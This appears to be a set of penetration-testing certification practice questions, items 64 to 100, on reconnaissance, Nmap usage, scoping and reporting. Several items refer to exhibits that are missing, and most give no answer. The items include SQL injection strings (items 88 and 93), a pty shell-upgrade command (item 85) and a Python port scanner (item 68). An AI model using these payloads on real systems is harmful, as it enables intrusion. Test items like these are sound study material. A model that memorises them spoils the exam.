following attacks is the MOST effective to allow the penetration tester to capture a handshake?
A.
Key reinstallation
B.
Deauthentication
C.
Evil twin
D.
Replay

65
Q

A penetration tester has gained access to part of an internal network and wants to exploit on a
different network segment. Using Scapy, the tester runs the following command:

Which of the following represents what the penetration tester is attempting to accomplish?
A.
DNS cache poisoning
B.
MAC spoofing
C.
ARP poisoning
D.
Double-tagging attack

66
Q

A company that requires minimal disruption to its daily activities needs a penetration tester to
perform information gathering around the company’s web presence. Which of the following would
the tester find MOST helpful in the initial information-gathering steps? (Choose two.)

A.
MX records
B.
Zone transfers
C.
DNS forward and reverse lookups
D.
Internet search engines
E.
Externally facing open ports
F.
Shodan results

A

Answer: D,F

67
Q

The attacking machine is on the same LAN segment as the target host during an internal
penetration test. Which of the following commands will BEST enable the attacker to conduct host
discovery and write the discovery to files without returning results of the attack machine?

A.
nmap -sn -n --exclude 10.1.1.15 10.1.1.0/24 -oA target_txt
B.
nmap -iR 10 -n -oX out.xml | grep "Nmap" | cut -d " " -f5 > live-hosts.txt
C.
nmap -Pn -sV -O -iL target.txt -oA target_text_Service
D.
nmap -sS -Pn -n -iL target.txt -oA target_txtl

68
Q

Using the output, identify potential attack vectors that should be further investigated.

A

1: Null session enumeration
Weak SMB file permissions
Fragmentation attack

2: nmap -sV -p 1-1023 192.168.2.2

3:
#!/usr/bin/python3
import socket
import sys

ports = [21, 22]

def port_scan(ip, ports):
    # TCP connect scan: attempt a full connection to each port and report its state
    for port in ports:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(3)
        try:
            s.connect((ip, port))
            print("%s:%s - OPEN" % (ip, port))
        except socket.timeout:
            print("%s:%s - TIMEOUT" % (ip, port))
        except socket.error:
            print("%s:%s - CLOSED" % (ip, port))
        finally:
            s.close()

port_scan(sys.argv[1], ports)

69
Q

A customer adds a requirement to the scope of a penetration test that states activities can only
occur during normal business hours. Which of the following BEST describes why this would be
necessary?

A.
To meet PCI DSS testing requirements
B.
For testing of the customer’s SLA with the ISP
C.
Because of concerns regarding bandwidth limitations
D.
To ensure someone is available if something goes wrong

70
Q

An assessor wants to use Nmap to help map out a stateful firewall rule set. Which of the following
scans will the assessor MOST likely run?

A.
nmap –sA 192.168.0.1/24
B.
nmap –sS 192.168.0.1/24
C.
nmap –oG 192.168.0.1/24
D.
nmap 192.168.0.1/24

71
Q

During the scoping phase of an assessment, a client requested that any remote code exploits discovered during testing would be reported immediately so the vulnerability could be fixed as
soon as possible. The penetration tester did not agree with this request, and after testing began,
the tester discovered a vulnerability and gained internal access to the system. Additionally, this
scenario led to a loss of confidential credit card data and a hole in the system. At the end of the
test, the penetration tester willfully failed to report this information and left the vulnerability in place.
A few months later, the client was breached and credit card data was stolen. After being notified
about the breach, which of the following steps should the company take NEXT?

A.
Deny that the vulnerability existed.
B.
Investigate the penetration tester.
C.
Accept that the client was right.
D.
Fire the penetration tester.

72
Q

A penetration tester is contracted to attack an oil rig network to look for vulnerabilities. While
conducting the assessment, the support organization of the rig reported issues connecting to
corporate applications and upstream services for data acquisitions. Which of the following is the
MOST likely culprit?

A.
Patch installations
B.
Successful exploits
C.
Application failures
D.
Bandwidth limitations

73
Q

A penetration tester has identified several newly released CVEs on a VoIP call manager. The
scanning tool the tester used determined the possible presence of the CVEs based off the number
of the service. Which of the following methods would BEST support validation of the possible
findings?

A.
Manually check the version number of the VoIP service against the CVE release.
B.
Test with proof-of-concept code from an exploit database on a non-production system.
C.
Review SIP traffic from an on-path position to look for indicators of compromise.
D.
Execute an nmap -sV scan against the service.

74
Q

The results of an Nmap scan are as follows:

Which of the following device types will MOST likely have a similar response?

A.
Active Directory domain controller
B.
IoT/embedded device
C.
Exposed RDP
D.
Print queue

75
Q

Which of the following are the MOST important items for prioritizing fixes that should be included
in the final report for a penetration test? (Choose two.)

A.
The CVSS score of the finding
B.
The network location of the vulnerable device
C.
The vulnerability identifier
D.
The client acceptance form
E.
The name of the person who found the flaw
F.
The tool used to find the issue

A

Answer: A,C

76
Q

User credentials were captured from a database during an assessment and cracked using rainbow
tables. Based on the ease of compromise, which of the following algorithms was MOST likely used
to store the passwords in the database?

A.
MD5
B.
bcrypt
C.
SHA-1
D.
PBKDF2

77
Q

A penetration tester is testing a web application that is hosted by a public cloud provider. The
tester is able to query the provider’s metadata and get the credentials used by the instance to
authenticate itself. Which of the following vulnerabilities has the tester exploited?

A.
Cross-site request forgery
B.
Server-side request forgery
C.
Remote file inclusion
D.
Local code inclusion

78
Q

A penetration tester was contracted to test a proprietary application for buffer overflow
vulnerabilities. Which of the following tools would be BEST suited for this task?

A.
GDB
B.
Burp Suite
C.
SearchSploit
D.
Netcat

79
Q

Which of the following would assist a penetration tester the MOST when evaluating the
susceptibility of top-level executives to social engineering attacks?

A.
Scraping social media for personal details
B.
Registering domain names that are similar to the target company’s
C.
Identifying technical contacts at the company
D.
Crawling the company’s website for company information

80
Q

A penetration tester is testing a new API for the company’s existing services and is preparing the
following script:

Which of the following would the test discover?

A.
Default web configurations
B.
Open web ports on a host
C.
Supported HTTP methods
D.
Listening web servers in a domain

81
Q

Given the following script:

Which of the following BEST characterizes the function performed by lines 5 and 6?

A.
Retrieves the start-of-authority information for the zone on DNS server 10.10.10.10
B.
Performs a single DNS query for www.comptia.org and prints the raw data output
C.
Loops through variable b to count the results returned for the DNS query and prints that count to
screen
D.
Prints each DNS query result already stored in variable b

82
Q

A penetration-testing team needs to test the security of electronic records in a company’s office.
Per the terms of engagement, the penetration test is to be conducted after hours and should not
include circumventing the alarm or performing destructive entry. During outside reconnaissance,
the team sees an open door from an adjoining building. Which of the following would be allowed
under the terms of the engagement?

A.
Prying the lock open on the records room
B.
Climbing in an open window of the adjoining building
C.
Presenting a false employee ID to the night guard
D.
Obstructing the motion sensors in the hallway of the records room

83
Q

A penetration tester discovers during a recent test that an employee in the accounting department
had been making changes to a payment system and redirecting money into a personal bank
account. The penetration test was immediately stopped. Which of the following would be the BEST
recommendation to discourage this type of activity in the future?

A.
Enforce mandatory employee vacations.
B.
Implement multifactor authentication.
C.
Install video surveillance equipment in the office.
D.
Encrypt passwords for bank account information.

84
Q

A penetration tester who is working remotely is conducting a penetration test using a wireless
connection. Which of the following is the BEST way to provide confidentiality for the client while
using this connection?

A.
Configure wireless access to use a AAA server.
B.
Use random MAC addresses on the penetration testing distribution.
C.
Install a host-based firewall on the penetration testing distribution.
D.
Connect to the penetration testing company’s VPS using a VPN.

85
Q

A penetration tester is able to use a command injection vulnerability in a web application to get a
reverse shell on a system. After running a few commands, the tester runs the following:
python -c 'import pty; pty.spawn("/bin/bash")'
Which of the following actions is the penetration tester performing?

A.
Privilege escalation
B.
Upgrading the shell
C.
Writing a script for persistence
D.
Building a bind shell

86
Q

A penetration tester opened a shell on a laptop at a client’s office but is unable to pivot because of
restrictive ACLs on the wireless subnet. The tester is also aware that all laptop users have a hardwired
connection available at their desks. Which of the following is the BEST method available to
pivot and gain additional access to the network?

A.
Set up a captive portal with embedded malicious code.
B.
Capture handshakes from wireless clients to crack.
C.
Span deauthentication packets to the wireless clients.
D.
Set up another access point and perform an evil twin attack.

87
Q

A tester who is performing a penetration test discovers an older firewall that is known to have
serious vulnerabilities to remote attacks but is not part of the original list of IP addresses for the
engagement. Which of the following is the BEST option for the tester to take?

A.
Segment the firewall from the cloud.
B.
Scan the firewall for vulnerabilities.
C.
Notify the client about the firewall.
D.
Apply patches to the firewall.

88
Q

A penetration tester is looking for vulnerabilities within a company’s web application that are in
scope. The penetration tester discovers a login page and enters the following string in a field:

1;SELECT Username, Password FROM Users;

Which of the following injection attacks is the penetration tester using?

A.
Blind SQL
B.
Boolean SQL
C.
Stacked queries
D.
Error-based

89
Q

Which of the following can be used to store alphanumeric data that can be fed into scripts or
programs as input to penetration-testing tools?

A.
Dictionary
B.
Directory
C.
Symlink
D.
Catalog
E.
For-loop

90
Q

A penetration tester is trying to restrict searches on Google to a specific domain. Which of the
following commands should the penetration tester consider?

A.
inurl:
B.
link:
C.
site:
D.
intitle:

91
Q

A client would like to have a penetration test performed that leverages a continuously updated
TTPs framework and covers a wide variety of enterprise systems and networks. Which of the
following methodologies should be used to BEST meet the client’s expectations?

A.
OWASP Top 10
B.
MITRE ATT&CK framework
C.
NIST Cybersecurity Framework
D.
The Diamond Model of Intrusion Analysis

92
Q

During a web application test, a penetration tester was able to navigate to https://company.com
and view all links on the web page. After manually reviewing the pages, the tester used a web
scanner to automate the search for vulnerabilities. When returning to the web application, the
following message appeared in the browser: unauthorized to view this page. Which of the
following BEST explains what occurred?

A.
The SSL certificates were invalid.
B.
The tester IP was blocked.
C.
The scanner crashed the system.
D.
The web page was not found.

93
Q

A red team completed an engagement and provided the following example in the report to
describe how the team gained access to a web server:

x' OR role LIKE '%admin%

Which of the following should be recommended to remediate this vulnerability?

A.
Multifactor authentication
B.
Encrypted communications
C.
Secure software development life cycle
D.
Parameterized queries

94
Q

The following output is from reconnaissance on a public-facing banking website:

Based on these results, which of the following attacks is MOST likely to succeed?

A.
A birthday attack on 64-bit ciphers (Sweet32)
B.
An attack that breaks RC4 encryption
C.
An attack on a session ticket extension (Ticketbleed)
D.
A Heartbleed attack

95
Q

Which of the following documents is agreed upon by all parties associated with the penetration-testing
engagement and defines the scope, contacts, costs, duration, and deliverables?

A.
SOW
B.
SLA
C.
MSA
D.
NDA

96
Q

In Python socket programming, SOCK_DGRAM type is:

A.
reliable.
B.
matrixed.
C.
connectionless.
D.
slower.

97
Q

Which of the following is the MOST important information to have on a penetration testing report
that is written for the developers?

A.
Executive summary
B.
Remediation
C.
Methodology
D.
Metrics and measures

98
Q

After gaining access to a Linux system with a non-privileged account, a penetration tester
identifies the following file:

Which of the following actions should the tester perform FIRST?

A.
Change the file permissions.
B.
Use privilege escalation.
C.
Cover tracks.
D.
Start a reverse shell.

99
Q

Which of the following types of assessments MOST likely focuses on vulnerabilities with the
objective to access specific data?

A.
An unknown-environment assessment
B.
A known-environment assessment
C.
A red-team assessment
D.
A compliance-based assessment

100
Q

A penetration tester initiated the transfer of a large data set to verify a proof-of-concept attack as
permitted by the ROE. The tester noticed the client’s data included PII, which is out of scope, and
immediately stopped the transfer. Which of the following MOST likely explains the penetration
tester’s decision?

A.
The tester had the situational awareness to stop the transfer.
B.
The tester found evidence of prior compromise within the data set.
C.
The tester completed the assigned part of the assessment workflow.
D.
The tester reached the end of the assessment time frame.